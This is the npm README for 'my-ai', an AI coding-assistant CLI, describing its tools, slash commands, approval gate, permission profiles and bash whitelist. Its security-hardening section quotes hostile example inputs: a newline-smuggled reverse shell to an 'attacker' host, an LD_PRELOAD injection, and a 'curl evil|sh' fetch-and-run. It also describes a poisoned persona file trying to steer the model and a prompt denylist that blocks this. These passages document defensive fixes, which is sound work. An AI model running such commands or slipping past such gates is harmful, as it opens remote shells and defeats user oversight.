@gh3ttoniga/my-ai
v0.11.1
Published
A free, local-first AI coding assistant CLI. Talks to Ollama by default and to Anthropic Claude when configured. Reads files, writes code, runs commands, and uses tools — like Claude Code in your terminal.
Maintainers
Readme
my-ai
A free, local-first AI coding assistant CLI. Talks to Ollama by default (any model you have running), and to Anthropic Claude when configured. Reads files, writes code, runs commands, and uses tools — like Claude Code in your terminal.
Default = Ollama = free. Nothing on your machine ever leaves your network. You can switch to Anthropic Claude (paid) any time by editing
.env.
What you get out of the box
- Streaming chat UI with concurrent tool calls
- 22 tools: files (
read_file,write_file,edit_file,delete_file,move_file), search (Glob,Grep,tree,list_dir), shell (bash+ backgroundbash_async/bash_output/bash_kill), web (WebFetch,web_search), dev (git,run_tests,read_lints,notebook_edit), agentic (spawn_agent,TodoWrite,ask_user), and self-extension (add_mcp_server) - Multimodal:
@image.png/@doc.pdf/ any file becomes a vision/text/extracted part the model can read - 31 slash commands, incl.
/undo,/map,/stats,/recall,/init,/review,/pr-comments,/rewind,/export,/memory,/context,/skill,/tree,/tree-conv,/mcp - Extensibility: custom slash commands + sub-agents (
.my-ai/commands|agents/*.md), lifecycle hooks (.my-ai/hooks.json), skills (7 bundled, auto-activating), plugins (.my-ai/plugins/), and an MCP client with 15 curated presets (browser, git, fetch, db, search, memory, and media: ComfyUI/PiAPI video, ElevenLabs voice, Manim animation) - Self-extension: when asked for something it can't do, my-ai researches a vetted tool (GitHub/npm) and wires it (
add_mcp_server) instead of refusing - Desktop app (
my-ai serveweb UI + Electron.exeshell), headless (my-ai -p "task"for CI/pipes), and an importable Agent SDK (createAgent().run()) - Provider abstraction: local Ollama, Anthropic Claude (incl.
claude-fable-5/claude-opus-4-8), or OpenRouter/MiniMax M3 — via.env - A layered safety model: bash whitelist, danger-tagged approval prompts, sandbox (
MY_AI_SANDBOX_ROOT), user rules (.my-ai/rules.json), secret redaction, an audit log, and three permission profiles - A Claude-Code-style chip surface for parallel tool batches: status pills, conflict warnings, per-batch timing, and a per-turn cost row (see What you'll see)
- 762 unit tests (pure-logic, no I/O —
npm test) plus end-to-end smokes - System prompt and tool-loop behavior inspired by Claude Code's publicly documented patterns — independently reimplemented here, not derived from upstream source
What's new in 0.11.0
The phase E1–E9 sweep toward full free-Claude-Code parity:
- Media generation (MCP presets):
comfyui(local image/video/audio/3D),piapi(cloud video/music/3D),elevenlabs(TTS/STT/voice),manim(animation video)./mcp add <name>. - Knowledge layer — skills:
.my-ai/skills/*.md+ 7 bundled (ui-ux, security, code-review, testing, performance, accessibility, api-design) that auto-activate on trigger keywords./skill. - Extensibility: custom commands + sub-agents from files, lifecycle hooks, plugins (bundles of the above).
- Background shells:
bash_async/bash_output/bash_killfor dev servers, watchers, builds. - Headless + SDK:
my-ai -p "task"(clean stdout, CI-ready) andcreateAgent().run(). - Seven built-in commands:
/init/review/pr-comments/rewind/export/memory/context. - Notebooks:
notebook_editfor.ipynbcells. MCP resources:/mcp resources+/mcp read. - Self-extension: the agent acquires missing capabilities (research →
add_mcp_server→ relaunch). - Integrations: a GitHub Action headless runner (
.github/workflows/my-ai.yml) and a VS Code extension scaffold (vscode-extension/).
What's new in 0.7.5
Five autonomy primitives wired into the existing CLI loop, all default-OFF (today's behavior is byte-identical without opt-in env). See also the Security hardening (0.7.5) section below for the three security fixes in this release, and the What you'll see section for the parallel-tool chip surface.
spawn_agent
Sub-agent delegation is now on the tool list (src/subagent.ts#SPAWN_AGENT_TOOL), with recursion bounded at 1. SUBAGENT_TOOLS strips spawn_agent from the child's tool surface AND runToolForSubAgent rejects spawn_agent by name as defense-in-depth so a future caller passing a wider tool set still cannot recursively spawn. The sub-agent's intermediate chat chatter never interleaves with the parent display (silent onText / onReasoning wrappers); only the final answer lands as the tool_result the parent model sees, plus a single dim ⹑ sub-agent: <N> turns, <M> tool(s) line on stderr. Activate: just ask the model to delegate a focused sub-task; no env var, no slash command.
budget
Per-task token/turn budget guard (src/budget.ts). Set MY_AI_MAX_TOKENS=N (positive int) and/or MY_AI_MAX_TURNS=N (positive int) in .env to cap a single agent loop. Either unset = unlimited; both unset = byte-identical to pre-0.7.5 behavior. When tripped the loop emits ⛔ stopped: <reason> and drops the user prompt without history corruption. Pin: tests/budget.test.ts verifies the byte-identical default-OFF behavior.
retry
Self-correction retry policy (src/retry.ts). Set MY_AI_AUTO_RETRY=1 (accepts 1 / true / yes / on) to enable. The model re-plans a failed tool call once with a synthetic correction injected as a tool_result-style message; escalate routes the model toward ask_user after the cap. MY_AI_MAX_RETRIES=N (default DEFAULT_MAX_ATTEMPTS = 2 = 1 original + 1 retry) bounds repeat storms. Pin: tests/retry.test.ts 6 fixtures cover accept / retry / escalate.
certifier
Tier 2.0 model-mode certifier upgrade (src/certify-model.ts#certifyWithModel). Set MY_AI_CERTIFY=model (or /certify model mid-session) so the active provider re-judges each tool result. The heuristic verdict is replaced on the model's pass / warn, preserved on unknown (fail-safe - a flaky model call cannot downgrade a confident pass). Per-tool upgrade writes an audit row to .my-ai/audit.log so the model's reasoning is visible. Pin: tests/certify-model.test.ts 4 fixtures verify the unknown-fail-safe.
sessions
Three new slash commands: /save [id] writes the in-memory messages[] to .my-ai/session-<safeId(id)>.json (default id "default"), /resume <id> splices it back over the in-memory messages, /sessions lists the saved set newest-updated first. Set MY_AI_AUTOSAVE=1 to autosave to a fixed session-autosave.json slot on every /exit AND SIGINT; default OFF preserves today's drop-on-exit semantics. Pin: tests/session.test.ts 5 fixtures cover round-trip + malformed input.
OpenRouter / MiniMax provider
The OpenAI-compatible dispatch in src/providers/ollama.ts already works against any OpenAI-compatible endpoint - set OPENAI_BASE_URL=https://openrouter.ai/api/v1 and OPENAI_API_KEY=<gateway-key>, leave PROVIDER=ollama. For MiniMax run a local proxy (e.g. llama.cpp --server) and point OPENAI_BASE_URL at it; the request/response shape already matches the OpenAI Chat Completions schema. No code changes; the path is documented and end-to-end-verified.
What's new in 0.8.0
The Tier 2.0 + autonomy night-run lands seven architectural commits (N1–N7) plus three smoke runners, two new modules, and 544 tests with 11 regression locks. The user-facing deltas:
certifyBatchis now async — the per-tool model-mode upgrade loop lives insidesrc/certify-batch.tsinstead of being dispatched inline insrc/cli.ts#agentTurn. SetMY_AI_CERTIFY=modelto upgrade each heuristic verdict via a single-shotaskOnceto the active provider;unknownfrom the model is fail-safe (preserves the heuristic, never downgrades a confident pass). Use the/certify modelslash command to switch mid-session.- MCP servers wire from
.my-ai/mcp.jsonat boot — define{"image":{"command":"npx","args":["-y","@modelcontextprotocol/server-canvas"]}}and the namespaced tools (mcp__image__generateetc.) register at startup. Per-server try/catch isolates failures; missing config silently no-ops. The CLI prints🔌 mcp: <N> MCP server(s) · <K> native tool(s) registeredunder the boot banner so you can see the result. move_fileis a gated first-class tool — joinsbash/delete_file/read_lintsin the[y/N]gate under thedefaultprofile; refused underreadonly. Works across devices (EXDEV copy-then-remove); creates destination parent dir./decompose <goal>instant plan tree — one model call returns a numbered plan;parsePlan+renderPlanprint○/▶/✓/✗glyphs. Re-issue bare to reprint the active plan, or with no plan in memory for a(no plan in this session — /decompose <goal> first)line.- OpenRouter / MiniMax / DeepSeek reasoning shows in the thinkpad — provider-field reasoning (
delta.reasoning,reasoning_content,reasoning_details[]) now flows through the💭stderr channel viasrc/think-reasoning.ts#extractReasoning. Inline-tag reasoning (Ollama, Anthropic with extended thinking) unchanged. PROVIDER_PRESETSfor first-run UX — four curated entries (openrouter/minimax/lm-studio/vllm) come with the package;formatPresetsList()renders them for/doctor --explain presets. Hosted vs local are distinguished viarequiresApiKey.MY_AI_AUTOCOMMITopt-in auto-commit — after awrite_file/edit_fileunder--no-approve/MY_AI_AUTO_APPROVE/ paranoid-accepted,src/autocommit.tsrunsgit add -A && git commit -m <tool: preview>. Best-effort, never throws; routes throughchild_process.execFile(NEVERshell:true); sanitizes multi-line forges and caps the message at 200 chars.- Three E2E smoke runners —
tools/certify-smoke.ts(certifier modes),tools/retry-smoke.ts(accept/retry/escalate),tools/session-smoke.ts(/saveroundtrip). All run the real CLI in tmpdir againstPROVIDER=mock+MY_AI_MOCK_SCRIPT— no Ollama / network required. - Pre-release gate + cut orchestrator —
tools/pre-tag-check.sh(11 regression locks mirroring CI) andscripts/release-cut.sh(defaults dry-run;--applyperforms the cut). Runnpm run pretagthennpm run release-cut -- --apply.
What's new in 0.8.1
A quality + test-coverage patch closing the post-v0.8.0 BUGLIST-pass2 audit. No user-facing surface change — every command, flag, env var, and slash command behaves identically to 0.8.0. The release is a refactor + documentation + test-completeness honest-bump: 544 unit tests now pass, up from 477 at v0.8.0.
src/cli.tstable-driven dispatch + catalog dedup — the 14-armif/else-ifREPL slash-cascade collapses to a singleMap-driven dispatch via the newsrc/dispatch.ts(slashCommandsMap + 19-entryDEFAULT_COMMAND_METADATAcatalog as the single source of truth for both dispatch andprintHelp). Routing fix:/save [id]and/resume <id>are indexed as bare/saveand/resume(sinceparseSlashsplits on first whitespace), so a/save abccall routes correctly to the canonical cmd key. The newregisterAllSlashCommandsinsrc/cli.tsiterates the catalog and binds each entry to ahandlersByCmdmap ofSlashHandlerclosures over module state — a missing-handler throws at module-load, so wiring drift fails fast rather than silently stub-falling.- Documentation completeness —
docs/COMMANDS.mdis now the canonical reference for all 19 commands (16 advertised + 3 hidden), withcmd/intent/response shape/when to usecolumns. Defensive-path test coverage onsrc/session.ts,src/doctor.ts,src/redact.ts(the M1+M2+M3 work). - Test coverage closed — 12 new fixtures in
tests/certify-batch.test.tspin the public surface ofcertifyBatch(calls, opts) ⇒ Promise<BatchCertification>(heuristic + N7 model-mode upgrade pass + 3 fail-safe paths + multi-call ordering). This was the lastsrc/file lacking unit-test coverage after H2 closed both providers.tests/commands.test.ts+tests/persona.test.tsclose the L2 / L3 catalog-shape andDEFAULT_PERSONAuniqueness contracts with grep + structural-shape pins.
Try it: npx @gh3ttoniga/[email protected]. The Tier 1.4–1.9 chip layer, BUF-1–3 autonomy primitives, Tier 2 certifier, MCP wiring, and move_file gate behavior are unchanged from v0.8.0.
What's new in 0.7.4
- Parallel-write collision — when two writes target the same path, a
⚠ colliding writes at indices i,jrow warns you before they race. - Auto-serialize opt-in — set
MY_AI_AUTO_SERIALIZE=1to ship colliding writes in order; they apply sequentially with the last write winning. - Per-turn cost row — a
💸 ~N in / ~N out · N tokline after every turn; Anthropic reports exact, Ollama falls back to achars/4estimate. - Verbose uniformity —
--verbosethreads through every chip class: args, results, slowest tool, and an↳ estimate (chars/4)vs.↳ model-reportedannotation. - Wider bash whitelist — opt
pnpm,bun,deno,npx, etc. into the auto-approved pattern viaMY_AI_SAFE_COMMANDS(no fork needed). - Broader error classification — timeouts and signal kills now register as errors, not as green-completed.
- System-prompt denylist — two known leaked-prompt aggregator repositories are blocked from sources this session.
/planaudit replay — see historical Tier 1.4 batch-level decisions (approved / revised / rejected / auto-approved) from.my-ai/audit.log./tokensslash command — per-role breakdown plus the active compaction budget and utilization percentage so you can see context-window pressure at a glance.- Hardened CI gate — every push runs
typecheck + test + build + chip smokeon Node 20 + 22; merges tomainare blocked on any failure.
Try it: npx @gh3ttoniga/[email protected] — both install paths below.
Security hardening (0.7.5)
Three adversarial gates closed in this release. None change the visible UX for normal usage — they tighten what the per-command bash whitelist auto-approves and what a poisoned persona file can drop. See docs/security-audit-0.7.x.md for the full L×I risk register and red-team-fixtures.md for the 20-entry fixture battery driving these tests.
Persona override cannot drop the denylist
A custom persona file — MY_AI_PERSONA env var or .my-ai/persona.md — replaces only the ## Persona and tone section of DEFAULT_PERSONA. The list of forbidden system-prompt aggregators (the two public repos holding leaked Claude Code 2.0 and Cursor 2.0 production prompts) is hardcoded into src/prompts.ts#DENIED_PATHS_SECTION and spliced into every buildSystemPrompt() output, independent of persona resolution. End-user behavior: a malicious persona loaded via MY_AI_PERSONA=./evil.md cannot instruct the model to read those repos. The denylist survives because the splice happens after the persona slot in the system-prompt template, not as a merge inside resolvePersona. Tested at tests/prompts.test.ts with both the env-axis and cwd-file C-β pin (denylist present in assistant.message after every persona override).
Bash whitelist newline escape
isSafeReadOnlyBash now early-returns { safe: false } for any command containing \r or \n. Closes the indirect-injection vector where a multi-line bash call with a safe leading binary (ls, git status, etc.) and a hostile second line (\nnc -e /bin/sh attacker 4444) would have been auto-approved under the read-only whitelist. Locks down the multi-line shell substitution path that was the only remaining way past the leading-token-only check. Tested at tests/whitelist.test.ts#multi-line command is never auto-safe.
Bash whitelist wrapper-binary escape
When the leading token is a wrapper binary (env, nice, timeout, nohup, xargs, stdbuf), the safety check now resolves past it to the real command. Two exploit shapes that used to auto-pass and now don't:
env LD_PRELOAD=/tmp/evil.so cat xwas:envwhitelisted +catwhitelist-OK in the second position +=not a metachar → auto-approved. No longer —stripWrappers()peelsenvdown toLD_PRELOAD=/tmp/evil.so cat x, which fails the metachar check on=and/.env X=1 bash -c 'curl evil|sh'was:envwhitelisted +bashwhitelist-OK +-cnot a destructive flag → auto-approved. No longer — recursion pastenvlands onbash -c 'curl evil|sh', which fails the metachar check on',|.
The wrapper resolution is bounded (max one level deep) so a chained env env env cmd can't loop forever. Tested at tests/whitelist.test.ts#wrapper binaries resolve to the real command + #stripWrappers: peels wrapper prefixes down to the real command.
These three fixes fine-tune the default profile's auto-approval surface; under readonly / paranoid, or with MY_AI_AUTO_APPROVE unset, the gate still prompts as before. They mostly matter when you're running with --no-approve and trusting the session. The decision line under each prompt and the audit log (.my-ai/audit.log) are unchanged — every gated call still gets logged regardless.
Setup — Ollama path (FREE, recommended)
1. Install Ollama
Download from https://ollama.com/download and run the installer. Or on macOS / Linux:
curl -fsSL https://ollama.com/install.sh | sh2. Pull a model
Tool calling is required. qwen2.5-coder:7b is a strong default. Pick one that fits your hardware:
# Lightweight (4–6 GB, runs on most laptops including CPU):
ollama pull qwen2.5-coder:3b
# or: ollama pull llama3.2:3b
# Default (8–10 GB, best balance — needs NVIDIA GPU for fast inference):
ollama pull qwen2.5-coder:7b
# Stronger (~20 GB, requires beefy GPU):
ollama pull qwen2.5-coder:32b
# Strongest (high-end GPU only):
ollama pull llama3.1:70bRun it once to confirm it works:
ollama run qwen2.5-coder:7b "Write a Python function to compute factorial"3. Configure my-ai
cp .env.example .env.env defaults to PROVIDER=ollama. Uncomment + edit the lines for the model you pulled.
4. Run
npm install
npm run dev # uses tsx, no compile step)You should see the my-ai banner, then a you › prompt.
Setup — Anthropic path (paid, opt-in)
If you'd rather use Claude over the API (highest capability):
- Sign up at https://console.anthropic.com/ and create an API key.
- In
.env, set:PROVIDER=anthropic ANTHROPIC_API_KEY=sk-ant-... npm run dev
Setup — MiniMax media (MCP integration, opt-in)
my-ai supports the Model Context Protocol (MCP) to plug in external tools. To enable MiniMax image + video + TTS:
pip install uvx- Inside the
my-aiREPL, run/mcp add minimax - Edit
.my-ai/mcp.jsonand fill yourMINIMAX_API_KEYfrom the MiniMax platform dashboard.MINIMAX_API_HOSTdefaults tohttps://api.minimax.io(override only for self-hosted or regional shards). /exitand relaunch — MCP wiring runs at boot. Expect under the banner:
plser mcp: 1 MCP server(s) ah 8 native tool(s) registered
ahev mcp:minimax (8 tools)Plus a /mcp show row minimax (green).
Namespacing: two MCP servers can both expose generate_image; the CLI
distinguishes them by server prefix (mcp__minimax__generate_image vs.
mcp__flux__generate_image). Every mcp__* call goes through the standard
[y/N] gate on every profile. Bypass with MY_AI_AUTO_APPROVE=1. See
docs/mcp-media.md for the full setup steps
(uvx install + API key + host override + troubleshooting + tool table).
Usage
First-time
npm install
cp .env.example .env
# edit .env to choose PROVIDER + model
npm run dev # fastest iteration
# or
npm run build && npm start # production runInstall & run
End users on any machine can run the published CLI without cloning — pick one:
# Reproducible — pins to the tested 0.7.4 release line:
npx @gh3ttoniga/[email protected]
# Track-the-latest global install — update with `npm i -g` again to bump:
npm i -g @gh3ttoniga/my-aiThe exec name is my-ai (mapped by package.json#bin to dist/cli.js). If you cloned the repo, the launcher in bin/run.sh (POSIX) / bin/run.ps1 (Windows) resolves the project root and prefers the compiled dist/cli.js so clone-developers get the same my-ai CLI surface:
npm install
npm run build
./bin/run.sh # POSIX
./bin/run.ps1 # WindowsWeb UI (my-ai serve)
A small HTTP server that drives the SAME agent loop the REPL uses — same provider dispatcher, same toolHandlers, same message envelope. Useful when you'd rather use a browser than the terminal, or when you'd like to expose the agent on a dashboard / piped through another service.
# Boot the web UI on the default port (8787, bound to 127.0.0.1)
my-ai serve
# Custom port + uploads directory
my-ai serve --port 3000 --uploads ./shared-uploads
# OS-assigned ephemeral port (handy in tests / multi-service dashboards)
my-ai serve --port 0
# LAN-share an existing model config without auto-launching a browser
my-ai serve --host 0.0.0.0 --no-openThe UI runs at http://127.0.0.1:<port>/ (the default browser opens on boot — best-effort, never throws — --no-open skips the spawn). It exposes a chat transcript with bubble-style messages (user / assistant / reasoning / uploaded-file pills), live SSE streaming (event: chunk per model delta + event: done with the final assistant text + event: error if the engine throws), an Upload button that POSTs to /api/upload (saved under ./uploads by default), and a GET /api/files list endpoint for the round-trip smoke. Routes:
GET /— static UI shell (no build pipeline;ui/index.html).GET /health—{"ok": true, "host": "<addr>", "port": <n>}liveness probe (used by the UI's status badge + any external/doctor-style curl smoke).GET /api/files—{"files": ["<name>", ...]}list of uploaded filenames (sorted, dotfiles filtered).GET /api/files/<name>— downloads with the right Content-Type viasafeFilename(404 if missing).POST /api/upload?name=<fn>— raw body becomes the file under./uploads/; returns{"file": "<safe>", "bytes": <N>}. Filenames are sanitized viasafeFilename— separators stripped, leading dots stripped, illegal chars (:*?"<>|) replaced, length clamped to 200,"file"fallback for empty.POST /api/chat— Server-Sent Events stream of one agent turn; send{message, files?}(single-message + optional file basename list — server is stateless, UI maintains history locally), receiveevent: chunkperonChunkcall +event: donewith the engine's return value +event: errorif the engine throws.
The chat surface reuses the same client.chat() call the REPL uses via src/agent-engine.ts — a single-message async function adapter ((message, onChunk, files) => Promise<string>) that wraps the existing provider call. REUSE-DON'T-FORK: same provider dispatcher, same persona + denylist + project block, same {role, content} message envelope the REPL uses; no second agent path. Power features (Tier 1.4 plan gate + certifier + budget/cost cap + profile/danger/prompt gate + Tier-1.6 chip layer + slash commands) stay terminal-only — they're an interactive UX and don't translate to a streaming HTTP consumer. A future tier could lift a sub-set into a request-level policy, but the wire today is "send your message + files, get streamed text back".
In-chat commands
/help- list available commands/clear- reset the conversation history/todos- ask the model to print the current todo list/doctor- diagnose provider + model setup (free-engine friendly)/doctor --explain <check>- root cause + one-line fix for a failing check (server,model,key,tools)/model [name]- show or switch the active provider at runtime (ollama,anthropic)/profile [name]- show or switch the permission profile (default,readonly,paranoid); persists to.my-airc/compact- force-summarize older turns now to free up context/tokens- show estimated-token breakdown of the current conversation (per role + total) plus the active compaction budget and utilization percentage, so you can see how full the context is without leaving the chat. ReadsMY_AI_COMPACTION_BUDGET(same var as the compactor) — malformed input falls back to the 8000-token default silently so a bad env var can never break the inspection./persona- show the active voice / push-back / style-defaults persona caption (resolved at boot fromMY_AI_PERSONAfile path or.my-ai/persona.md)/persona reload- prints a note that the caption is captured at boot; reloading mid-session is a no-op (exit + re-launch to pick up an edited persona file)/persona reset- show how to return to the built-in default persona (clear.my-ai/persona.md/ unsetMY_AI_PERSONA, then re-launch)/plan- replay the Tier 1.4 batch-level plan-gate decisions recorded in.my-ai/audit.log(filters theplan-*audit lines: approved / revised / rejected / auto-approved). The gate's pure-logic decision (evalPlanGate/estimateBatchLineDelta/renderPlanCard) lives insrc/plan.ts(~180 lines, no I/O); end-to-end exercised bytools/tier1.4-smoke.ts./tree [path]- print a compact directory tree rooted atpath(defaults to cwd). Skipsnode_modules,.git, build/CI caches, and dotfiles by default; capped at depth 3 + 200 entries; unreadable dirs are silently skipped. Delegates tosrc/explore.ts#fsTree(also powers thetreemodel tool the parent + read-only sub-agents can call). Same↳/truncation rules as the width-timetools/tier1.6-chip-smoke.tsfamily of fixtures./tree-conv- show this session's conversation as a git-style tree. The REPL persists each message as a JSON node under.my-ai/conversation/<id>/(one file per message, each linking to its parent);/tree-convreads them back and prints an indented outline with role glyphs and abranch point(s)footer (a node gains a second child when you rewind with/undoand continue). Best-effort — a write failure prints a dim warning and never breaks the turn. Delegates tosrc/conversation-tree.ts./mcp- list curated MCP presets;/mcp add <preset>wires one into.my-ai/mcp.json;/mcp showlists connected servers;/mcp resources//mcp read <server> <uri>browse a server's resources/skill [name]- list skills (.my-ai/skills/*.md+ bundled), or activate one into the system prompt; skills also auto-activate on trigger keywords/undo- restore the most recent file change (the lastwrite/edit/delete/move)/map [path]- print a compact exported-symbol map of source files (defaultsrc)/stats- per-session tool-usage table (calls, errors, total ms)/recall <query>- search saved sessions (.my-ai/session-*.json) for text/init- scan the repo and write aCLAUDE.mdproject-memory file/review [staged]- have the model review the currentgit diff(addstagedfor the index)/pr-comments [n]- list review comments on a PR via theghCLI/rewind [n]- drop the lastnexchanges from the conversation (default 1)/export- export the conversation to a markdown file under.my-ai//memory <fact>- append a fact to.my-ai/instructions.mdand apply it this session/context- estimated token-window usage by role (system / user / assistant / tool)/save [id],/resume <id>,/sessions,/decompose <goal>- session + planning helpers/exit- quit (also:/quitor Ctrl+C)
What you'll see — the chip surface
When the model calls tools, each parallel batch renders as a bracketed cluster of status "chips" on stderr (the visible answer stays clean on stdout):
⚡ 3 tools in parallel
○ read_file({"path":"src/a.ts"})
○ bash({"command":"ls"})
○ write_file({"path":"src/a.ts", ...})
● read_file src/a.ts · 42 lines
● bash $ ls · 7 lines
● write_file src/a.ts · CREATE (+12 lines)
⚠ src/a.ts · colliding writes at indices 0,2
⚡ 3 tools · 1.2s- Pending pills (
○, cyan) print once per tool before dispatch — one aggregate⚡ N tool(s) in parallelheader, then a pill per call (Tier 1.6). - Completed pills tint by outcome:
●green ok,✖red error (anyError…result or a non-Exit: 0bash wrap — incl. timeouts/signal kills),⊘yellow blocked (areadonly-profile refusal). Each carries a one-line hint (<path> · CREATE (+N lines),±N lines,$ <cmd> · N lines, …) (Tier 1.6). - Conflict chip (
⚠, Tier 1.8): when two tracked writes (write_file/edit_file/delete_file) in the same batch target the same path, a⚠ <path> · colliding writes at indices i,jrow warns that they'd race; under thedefaultprofile this also escalates the batch to the plan gate (Path A) so you approve before they apply. - Batch timing (
⚡ N tools · <time>, Tier 1.7): the closing bracket of every batch — wallclock for the concurrent dispatch,Nmsunder a second,N.Nsover. - Cost row (
💸, Tier 1.9): a per-turn token estimate row (~<in> in / ~<out> out · <total> tok). Anthropic reports real usage; Ollama is achars/4estimate.
Under --verbose (or /verbose on) the cluster expands homogeneously (Tier 1.9): each pending pill gains a dim ↳ args: <full JSON> line, each completed pill a ↳ result preview, the timing line names the ↳ slowest: <tool>, and the cost row annotates ↳ estimate (chars/4) vs. ↳ model-reported.
Free engine troubleshooting (/doctor)
Run /doctor anytime to check whether the free (Ollama) engine is set up
correctly. It probes the configured provider, lists installed models, flags
which ones can do tool calling, and tells you the next step.
- ✅ All green → "Free engine ready" — start typing.
- ⚠️ Ollama not reachable → install + start, with copy-pasteable setup steps.
- ⚠️ Model not installed → "set OLLAMA_MODEL= in .env" if a tool-capable
one is already on disk, or
ollama pull <model>if not. - For Anthropic,
/doctorjust verifiesANTHROPIC_API_KEYis set.
Troubleshooting
When a check fails, ask for the root cause and a one-line fix instead of a bare status:
/doctor --explain server # is the Ollama daemon reachable? how to start it
/doctor --explain model # is the configured model installed? pull recipe
/doctor --explain key # is ANTHROPIC_API_KEY set? where to get one
/doctor --explain tools # are tools registered?Each prints cause: (what's actually wrong) and fix: (a copy-pasteable next
step). model defers to server when the server is down, so you fix the
upstream problem first.
| Symptom | Try |
|---|---|
| "Ollama not reachable" | /doctor --explain server → ollama serve, or fix OLLAMA_BASE_URL |
| Model answers but ignores tools | model isn't tool-capable — /doctor lists which installed models are; switch with /model or OLLAMA_MODEL |
| Last few characters of an answer look cut off | fixed in 0.4.x — update; the streaming flush now drains trailing chars |
| Every command prompts even safe ones | you're on the paranoid profile — /profile default |
| bash calls are refused | you're on the readonly profile — /profile default |
| Approval prompt loops in a script | non-TTY can't approve — pass --no-approve or set MY_AI_AUTO_APPROVE=1 |
Approval gate
Destructive and shell-spawning tools (bash, delete_file, read_lints) show [y/N] before running — the safe default. Bypass it when you trust the session:
- One-shot (per invocation):
my-ai --no-approve - Persistent (set once in
.env):MY_AI_AUTO_APPROVE=1(also acceptstrue/yes/on)
When the gate is bypassed, every gated call runs without prompting and a ⚠ auto-approved (--no-approve) line is logged to stderr. Reads, writes, edits, glob, grep, web fetch, web search, and todo tracking are never gated.
The decision line under each prompt tells you exactly what will happen — e.g. $ rm -rf node_modules for bash, the file path for delete_file, or the file being linted for read_lints. When the command matches a risky pattern (recursive rm, --force / --force-with-lease, force push, raw dd writes, chmod/chown, sudo, pipe-to-shell, git reset --hard/rebase/filter-branch) a red danger badge is shown on the prompt so it can't be rubber-stamped.
Every gate decision — auto-approved, whitelisted, approved, rejected, blocked — is appended to .my-ai/audit.log (tab-separated: timestamp, decision, tool, danger tags, input preview). Logging is best-effort and never blocks the loop. .my-ai/ is gitignored.
Permission profiles
A coarse safety dial layered on top of the per-command whitelist. Switch at runtime with /profile <name>; the choice persists to .my-airc (gitignored). You can also set it per session with MY_AI_PROFILE, which takes precedence over the file.
| Profile | Per-tool gate | --no-approve / MY_AI_AUTO_APPROVE | Tier 1.4 plan gate (write-heavy batch) |
|---|---|---|---|
| default | Read-only bash auto-approved via whitelist; other gated tools prompt [y/N]. | Bypasses the [y/N] prompt (decision still audit-logged). | Fires on ≥2 file writes or ≥50 estimated new lines; a Tier 1.8 same-path collision also escalates an under-threshold batch to the plan card (Path A). Approving the plan suppresses the per-write diff prompts. |
| readonly | Refuses subprocess-spawning tools (bash, read_lints) outright. File read/write/edit still work. | N/A for shell tools (already blocked). | Skipped — writes are allowed, but nothing shells out. |
| paranoid | Every tool call (except ask_user) requires [y/N]. | Ignored — paranoid always prompts. | Layered: you see the plan card and each per-write diff prompt. |
Environment variables
| Var | Values | Effect |
|---|---|---|
| MY_AI_PROFILE | default | readonly | paranoid | Permission profile for the session; takes precedence over .my-airc. |
| MY_AI_AUTO_APPROVE | 1 / true / yes / on | Skip the [y/N] approval prompt (every decision is still audit-logged). Same effect as the --no-approve flag. |
| MY_AI_SAFE_COMMANDS | CSV / whitespace list of binary basenames | Extend the read-only bash whitelist without forking (e.g. pnpm,bun,deno,npx). Metachar + destructive-flag checks still apply. |
| MY_AI_COMPACTION_BUDGET | positive integer (default 8000) | Token budget before older turns are compacted. Negative / non-numeric throws fast on the first compaction call. |
| MY_AI_AUTO_SERIALIZE | 1 / true / yes / on | Tier 1.8 Path B (opt-in, off by default). On a same-path write_file / edit_file / delete_file collision in a batch under the default profile, src/plan.ts serializeCollisions reorders the colliding calls into a sequential slice so writes apply lowest-index→highest-index (the highest-index write wins, no Promise.all race), and src/chips.ts printAutoSerializeNote surfaces a neutral dim ↳ auto-serialized: <path> indices <i,j,k> row instead of the Tier 1.8 ⚠ warning. The Tier 1.4 plan-gate escalation (Path A) is also skipped. End-to-end exercised by Scenario E in tools/tier1.6-chip-smoke.ts. |
| MY_AI_PERSONA | path to a persona file | Voice / push-back / style-defaults caption, resolved at boot (file path only — not inline text). Falls back to .my-ai/persona.md, then the built-in default. |
Reasoning models (think discipline)
Reasoning-capable Ollama models (deepseek-r1, qwen3 with reasoning mode, llama 3.x with extended thinking) and Anthropic Claude with extended thinking emit a private scratch section inline in their response - between think.../think markers for Ollama, or as a separate thinking content block for Anthropic. The CLI captures that section as a dim "thinkpad" transcript on stderr (prefixed with a thinking emoji) so you can see what the model is reasoning about, and the final stored assistant message is stripped of those markers so the reasoning never becomes payload for the next turn. The visible answer on stdout stays clean.
Whitelisted read-only bash commands
A small set of obviously-safe bash commands skip the prompt entirely, even when the gate is on. They are logged as ⚙ safe (whitelisted read-only: <command>).
- Plain binaries (any args):
ls,cat,head,tail,less,more,wc,file,stat,pwd,tree,du,basename,dirname,realpath,readlink,which,whereis,type,grep,rg,diff,sort,uniq,tr,cut,strings,ps,top,htop,pgrep,help,man,info,history,env,printenv,echo,date,whoami,hostname,uname,uptime,jq,xxd,hexdump,base32,base64 gitread-only subcommands (2nd token):status,log,diff,show,branch,remote,rev-parse,tag,stash,ls-files,ls-tree,shortlog,describe,blame,reflog(note:configis not whitelisted —git config foo barwrites to.git/config, so it always prompts)npmread-only subcommands (2nd token):test,ls,view,list,info,audit### Extending the whitelist (no fork needed)
You can extend the safe-command list without forking the project via the
MY_AI_SAFE_COMMANDS env var. Comma- or whitespace-separated binary basenames
are added to the read-only set; useful for opting pnpm, bun, deno,
npx, etc., into the auto-approved pattern. Example in .env:
MY_AI_SAFE_COMMANDS=pnpm,bun,deno,npxSafety checks (metachars, destructive flags) still run first and
unconditionally, so this widens read-only recognition but never bypasses
the lookup. The leading-token match is basename-based, so /usr/local/bin/pnpm
and pnpm both register as pnpm. To stay safe, do NOT add bash, sh,
python, node, or any other subshell-capable binary — they'd auto-pass
the leading-token check, and a bash -c … invocation wouldn't trip any
metachar inside the -c argument.
The whitelist refuses any command with shell metacharacters (;&|<>$(){} ^`` =) or destructive flags (-delete, -exec, --rm, --delete, --force, --write, --set-output). Anything that could chain (&&) or pipe (|`) into another command always prompts. Commands not on the list also always prompt — better safe than quiet.
Compaction budget
When the running message list exceeds the compact-trigger threshold (in estimated tokens), the oldest turns are folded into a single summary and the tail is preserved verbatim (see src/compaction.ts). The threshold defaults to 8000 tokens (cheap chars/4 heuristic, no tokenizer dependency).
For long sessions and large contexts you may want to raise it. For shorter conversations or hardware-constrained runners you may want to lower it. Set in .env:
# Tunable; must be a non-negative integer. Leave unset to use 8000.
